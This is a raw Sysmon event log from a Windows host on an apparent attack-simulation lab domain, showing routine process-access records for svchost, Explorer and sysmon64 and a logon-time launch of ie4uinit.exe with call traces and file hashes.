13:29:58.857{08A6967A-4288-6000-1000-000000009A01}11361504C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\shsvcs.dll+11f99|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4288-6000-1000-000000009A01}11361504C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x101068C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\shsvcs.dll+11f27|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4754-6000-1705-000000009A01}34085068C:\Windows\Explorer.EXE{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\System32\SHELL32.dll+552284|C:\Windows\System32\SHELL32.dll+551ce0|C:\Windows\System32\SHELL32.dll+551e54|C:\Windows\System32\SHELL32.dll+234591|C:\Windows\System32\SHELL32.dll+23444c|C:\Windows\System32\SHELL32.dll+1234a1 154100x800000000000000010401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXE"C:\Windows\System32\ie4uinit.exe" -UserConfigC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000010400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 